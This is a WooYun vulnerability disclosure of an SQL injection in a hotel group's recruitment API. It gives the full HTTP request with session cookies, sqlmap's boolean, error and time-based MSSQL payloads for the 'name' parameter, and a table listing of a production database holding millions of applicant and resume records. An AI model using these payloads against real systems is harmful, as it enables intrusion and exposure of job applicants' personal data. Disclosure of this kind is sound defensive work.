
Vulnerability summary

Defect ID: wooyun-2016-0184337

Title: SQL injection vulnerability in an API of Huazhu Hotels (华住酒店)

Vendor: Hanting Hotels (汉庭酒店)

Author: Looke

Submitted: 2016-03-13 21:22

Fixed: 2016-04-28 16:09

Published: 2016-04-28 16:09

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2016-03-13: Details sent to the vendor, awaiting vendor handling
2016-03-14: Vendor confirmed; details visible to the vendor only
2016-03-24: Details disclosed to core white hats and relevant domain experts
2016-04-03: Details disclosed to regular white hats
2016-04-13: Details disclosed to intern white hats
2016-04-28: Details disclosed to the public

Brief description:

As the title says.

Detailed description:

Vulnerability location:

[Screenshot: 1.jpg]


[Screenshot: 2.jpg]


Vulnerable endpoint:

POST /api/InternalInfo/InternalRecommendJobAdListForPy HTTP/1.1
Accept-Language: zh-CN
X-Requested-With: XMLHttpRequest
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Referer: http://recruitofficer.tms.beisen.com/PyInternal/RecommendList?From=Custom
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; MI NOTE LTE Build/KTU84P) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
Origin: http://recruitofficer.tms.beisen.com
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Host: recruitofficer.tms.beisen.com
Cookie: beisenBusiType=JRv3/pK7NziIls4YxGA20w==; beisenCache6=C4SrRW0T8K1c+nNU0WUJlNVchab9/ID4p/t53IGXkzqVYvI+LRIurtLiFgdyfNJCMAaNkLRPys6hSetzj30FJMcPz8HiQSy3cz/pQ/4/rSMdh6NQI8XUJDC1wGGGm14XEBNNImV1PdiGp4tZNxR4krTgDoxwiwJ1uPcxPz2/zUFeWtFlig4nH1ZfNqtF7tC02G2myFiAktQfDFCfp0WQGplKcea6B3pKTIscGXvZNuHdCpjb6EZ8D5btrAOI4yuLEDI1u2PGJgseabEgimWZF/AROVhscEWCXGnBRI1dNVLcwFp598/kAd9TzJuhnKSi6hbvklSFc/MRsgLKdJMEa81u8rIsMijhJcpi5hmdzAs=; beisenVersion=sV0zQHmV7HA8ZV5SYGkVgA==; gr_session_id_e30f00323ed092421ec53b5aa52e4465=7820e748-50a0-4591-88e2-188433c35cd7; gr_user_id=3547aaf3-91c3-4793-a649-be6a8582fe89
Content-Length: 53
pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7*


The name parameter is injectable (sqlmap output):

---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 7680=7680 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 3354=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3354=3354) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113))) AND '%'='
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 4713=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
---
[20:30:16] [INFO] testing Microsoft SQL Server
[20:30:16] [INFO] confirming Microsoft SQL Server
[20:30:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008

Proof of vulnerability:

Database:

[Screenshot: 数据库.jpg]


There is a great deal of data; see below. As for what information it holds, you know better than I do. This was only a test: the database was not dumped, and the logs can confirm that. Could I get a high rank?

Database: BeisenRecruitment001
+-------------------------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------------------------+---------+
| dbo.Rel_ObjectDataOfApplicant | 21910244 |
| dbo.StandardResumeDetailValue | 18802224 |
| dbo.RelationHistory | 11254767 |
| dbo.ApplyDocument | 7516347 |
| dbo.ApplicantHistory | 6111962 |
| dbo.ApplicantHistoryDigest | 5173063 |
| dbo.PhaseTransferHistory | 4925655 |
| dbo.REL_PersonJobStoreDB | 4376542 |
| dbo.ResumeExperience | 4144101 |
| dbo.ApplicantImportCenterInfo | 2715594 |
| dbo.ResumeEducation | 2707816 |
| dbo.Rel_ObjectDataOfApply | 2616834 |
| dbo.SearchCV | 2605691 |
| dbo.SearchCVExtend | 2601771 |
| dbo.ApplicantProfileLite | 2590488 |
| dbo.StandradResumeValue | 2469684 |
| dbo.REL_PersonJobHistory | 2425882 |
| dbo.PersonApplyStat | 1998890 |
| dbo.MailMessage | 1339401 |
| dbo.GenericExtendCounter | 1256675 |
| dbo.PendingPerson | 1179443 |
| dbo.ResumeProject | 1056161 |
| dbo.PersonStoreDbHistory | 938211 |
| dbo.ApplicantImportCenter | 285102 |
| dbo.SerialNumber | 266092 |
| dbo.SynchronizeApplicant_SearchCV_GetPersonID_ParametersLog | 259574 |
| dbo.SerialNumberHistory | 243251 |
| dbo.MessageSentHistory | 240622 |
| dbo.REL_BeisenUserID | 233569 |
| dbo.InterviewHistory | 146300 |
| dbo.Relation_Interview_Interviewee | 131212 |
| dbo.Remark | 116225 |
| dbo.JobRelationOperationHistory | 107369 |
| dbo.Rel_PersonAndResumeFilter | 89735 |
| dbo.TitaTaskManage | 81698 |
| dbo.AppMessage | 78557 |
| dbo.InterviewInfoHistroy | 76967 |
| dbo.InterviewInfo | 73927 |
| dbo.ProxyLog | 73015 |
| dbo.Relation_Interview_RemindJob | 72799 |
| dbo.ReplyRecord | 62606 |
| dbo.DownLoadedResume | 61974 |
| dbo.ProcessPhaseStatusConfig | 60397 |
| dbo.Counter_2 | 53073 |
| dbo.Relation_Interview_Interviewer | 51759 |
| dbo.ReplySetHistory | 48092 |
| dbo.Rel_PhaseAndStatus | 45542 |
| dbo.InterviewEvaluateResult | 43635 |
| dbo.UploadedAttachment | 40956 |
| dbo.ReplyMessageInfo | 35024 |
| dbo.InterviewerReplySendRecord | 33324 |
| dbo.JobAdChannel_Class | 28797 |
| dbo.JobAD | 27143 |
| dbo.JobADLoc | 25640 |
| dbo.Rel_ProcessAndPhase | 24893 |
| dbo.InterviewFeedBack | 24355 |
| dbo.JobAd_External | 23578 |
| dbo.JobBrowseLog | 22272 |
| dbo.Job | 19671 |
| dbo.ProcessPhase | 19285 |
| dbo.ProcessStatus | 19110 |
| dbo.JobADAdditionalObject | 17633 |
| dbo.ResumeTempFolder | 17386 |
| dbo.ResumeFilter | 16533 |
| dbo.WechatUserAndPerson | 15892 |
| dbo.ReportLog | 15809 |
| dbo.Rel_ResumeTempFolderAndUser | 15744 |
| dbo.EmaiJobRule | 15392 |
| dbo.JobLoc | 12968 |
| dbo.ProcessReason | 11750 |
| dbo.JobAdChannel_Apply | 10986 |
| dbo.Officer | 10885 |
| dbo.Rel_StatusAndReason | 10446 |
| dbo.ResumeDownload | 9883 |
| dbo.REL_ObjectId_ShareGroupId | 9232 |
| dbo.OfferHistory | 9049 |
| dbo.InterviewerReply | 8989 |
| dbo.BatchRankingScore | 7436 |
| dbo.RecieveSummary | 7283 |
| dbo.Rel_ApplicantAndLabel | 7135 |
| dbo.REL_JobAndInterviewEvaluation | 6754 |
| dbo.SendMailLog | 6420 |
| dbo.InterviewEvaluationDetailItem | 6050 |
| dbo.ExportHistory | 5984 |
| dbo.ApplicantViewCondition | 5980 |
| dbo.ConstItem | 5913 |
| dbo.TitaPorjectManage | 5753 |
| dbo.Permission | 5176 |
| dbo.EffectiveOffer | 4958 |
| dbo.EffectiveOfferApply | 4898 |
| dbo.RecruitProcess | 4599 |
| dbo.HrJobBrowseLog | 4484 |
| dbo.OfferAssesment | 4049 |
| dbo.OfferCreaterMailInfo | 3849 |
| dbo.Offer | 3779 |
| dbo.Interview | 3595 |
| dbo.AutoInvitTest | 3348 |
| dbo.ApplicantView | 3009 |
| dbo.Rel_InternalRecommend | 2994 |
| dbo.OfferApply | 2849 |
| dbo.Relation_InterviewMessage_Interviewee | 2627 |
| dbo.StoreDB | 2440 |
| dbo.Finder | 2141 |
| dbo.SearchFieldOption | 1956 |
| dbo.StaticizeLog | 1899 |
| dbo.Attention | 1852 |
| dbo.BizLookLog | 1711 |
| dbo.ChannelRelation | 1657 |
| dbo.MicroProcessMessageLog | 1335 |
| dbo.InterviewLocation | 1316 |
| dbo.RewardRulesSublist | 1098 |
| dbo.StatisticsThisMonth | 1035 |
| dbo.JobADPostUserName | 919 |
| dbo.ConstItemId | 825 |
| dbo.ApplicantLock | 739 |
| dbo.RecruitPackage | 716 |
| dbo.ChannelAuthorize | 691 |
| dbo.ChannelSource | 677 |
| dbo.ExamRoomPlan | 666 |
| dbo.InterviewInfoType | 632 |
| dbo.BadMessage | 604 |
| dbo.InterviewSession | 573 |
| dbo.MicroProcessActivity | 566 |
| dbo.BlackListHistory | 545 |
| dbo.RewardRules | 457 |
| dbo.RecuritProject | 440 |
| dbo.BlackList | 419 |
| dbo.MicroProcess | 360 |
| dbo.ExportFieldTemplate | 357 |
| dbo.WebotSyncRecord | 336 |
| dbo.ChannelDeliveryMapping | 310 |
| dbo.InterviewEvaluationPartItem | 309 |
| dbo.GlobalSetting | 296 |
| dbo.ResumeKeywordsLibrary | 294 |
| dbo.HunterAccount | 249 |
| dbo.Label | 242 |
| dbo.MailReceiveStrategy | 238 |
| dbo.ReceiveEmailList | 238 |
| dbo.IndexMap | 192 |
| dbo.JobTitleLibrary | 185 |
| dbo.Duty | 182 |
| dbo.ReSendEmailOrSmsHistory | 177 |
| dbo.StandardResumeDetailField | 157 |
| dbo.Station | 141 |
| dbo.ConstType | 136 |
| dbo.CadidateId | 131 |
| dbo.InterviewEvaluationBasicInfo | 126 |
| dbo.JobTemplate | 125 |
| dbo.SelectAllPageErrorInfo | 121 |
| dbo.InterviewEvaluate | 101 |
| dbo.InterviewSite | 97 |
| dbo.MarketActivity | 96 |
| dbo.WeChatOfficer_MyRecommend_CountResult | 73 |
| dbo.FromList | 56 |
| dbo.Requirement | 56 |
| dbo.TalentMining | 52 |
| dbo.WeChatOfficer_PyInternal_CountResult | 49 |
| dbo.Relation_InterviewMessage_Officer | 47 |
| dbo.InterviewEvaluationDictDetial | 40 |
| dbo.Assesment | 39 |
| dbo.InterviewSite_Officers | 36 |
| dbo.ExamRoom | 28 |
| dbo.RestTime | 28 |
| dbo.Widget_Option | 28 |
| dbo.Medium | 27 |
| dbo.RankAndFilter | 25 |
| dbo.Invitation | 23 |
| dbo.ApplicantLockSet | 18 |
| dbo.WeChatOfficer_RedEnvelopes | 16 |
| dbo.RankingScoreHistory | 15 |
| dbo.StandardResumeDetailSection | 14 |
| dbo.ActionTiggerCondition | 13 |
| dbo.ActionForSendNotification | 11 |
| dbo.RecuritProjectCondition | 11 |
| dbo.AutoTask | 10 |
| dbo.Functions | 10 |
| dbo.ChannelKind | 9 |
| dbo.StandardResumeField | 9 |
| dbo.MediumGroup | 8 |
| dbo.Widget | 7 |
| dbo.InterviewEvaluationDictType | 4 |
| dbo.TaskItem | 3 |
| dbo.AccessmentResultForUpdateApply | 2 |
| dbo.DefaultEmailReceiveStrategy | 2 |
| dbo.InterviewEamilEvaluation | 1 |
+-------------------------------------------------------------+---------+
Database: msdb
+-------------------------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------------------------+---------+
| dbo.backupfile | 975572 |
| dbo.backupset | 487786 |
| dbo.backupmediafamily | 487783 |
| dbo.backupmediaset | 487783 |
| dbo.restorefile | 68 |
| dbo.restorefilegroup | 34 |
| dbo.restorehistory | 34 |
| dbo.syspolicy_configuration | 4 |
+-------------------------------------------------------------+---------+

Fix recommendation:

Filtering.

Copyright notice: when reposting, please credit the source: Looke@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 12

Confirmed: 2016-03-14 16:09

Vendor reply:

Hello! Thank you for your attention to Huazhu Hotels Group; this issue has been handed over to the relevant team for follow-up.

Latest status:

None yet